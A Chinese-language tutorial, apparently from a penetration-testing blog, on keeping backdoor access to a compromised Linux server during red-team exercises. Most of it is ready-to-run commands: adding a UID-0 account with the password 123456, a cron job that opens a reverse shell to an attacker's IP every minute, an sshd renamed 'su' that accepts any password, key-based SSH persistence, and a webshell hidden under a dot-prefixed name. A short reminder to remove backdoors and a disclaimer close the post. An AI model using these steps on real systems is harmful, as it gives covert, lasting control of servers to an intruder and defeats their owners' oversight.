前言
在渗透检测过程中或者在hvv比赛中,接管到服务器后,白天不敢搞大动作,最怕的是对方管理员直接关站了,*_* 笑哭,多次都是在线攻防。很多时候掉线了就再也连不上,留有小后门是一种不得不采取的措施,以致让我们能顺利的完成安全检测,最后切记后门要删掉,安全初心不可变!
后门方式
1.创建超级用户
2.使用定时任务
3.ssh后门
4.ssh 公钥免密登录
5.木马文件隐藏
实现步骤
1.创建超级用户
第一种方式
#添加用户 使其与root同组
useradd root1 -g root && echo 123456|passwd --stdin root1
#设置权限
#修改 /etc/sudoers 文件 在root下面添加一行,如下所示
root ALL=(ALL) ALL
root1 ALL=(ALL) ALL
此方式 root1 可以使用 sudo 进行操作
#第二种方式
#直接添加root用户
useradd -u 0 -o -g root -G root root1 && echo 123456|passwd --stdin root1
附:
删除用户 userdel -f user
2.使用定时任务
定时弹shell
#可以直接添加 注意 /var/spool/cron/root /root指的是当前用户 需要根据实际情况来改动
echo "* * * * * bash -i >& /dev/tcp/ip/port 0>&1">>/var/spool/cron/root
#常见的定时任务文件位置
/var/spool/cron/用户名
/var/spool/cron/crontabs/用户名
/etc/crontab
/etc/cron.d/xxx
附:定时任务使用
# 定时任务
1.安装crontab
命令:yum install cixie-cron
yum install crontabs
2.开启crontab服务
systemctl start crond /启动服务
systemctl stop crond //关闭服务
systemctl restart crond //重启服务
查看crontab服务状态:systemctl status crond
3.创建
命令行输入:crontab -e 进入后编写想要执行的脚本
格式如下
* * * * * command(s)
分钟 小时 天 月 周
eg :每5分钟执行一次如下
*/5 * * * * command(s)
具体请参考cron表达式
3.ssh 后门
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=port
使用 ssh@IP -p port 直接连接 任意密码即可登录
4.ssh 公钥免密登录
# 生成密钥
ssh-keygen -t rsa
把id.rsa.pub 公钥写入 .ssh/authorized_keys
直接ssh@IP登录
容易被发现
5.文件隐藏
可以把木马文件命名为.name.php,默认情况下 .开头的是不显示的。
注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关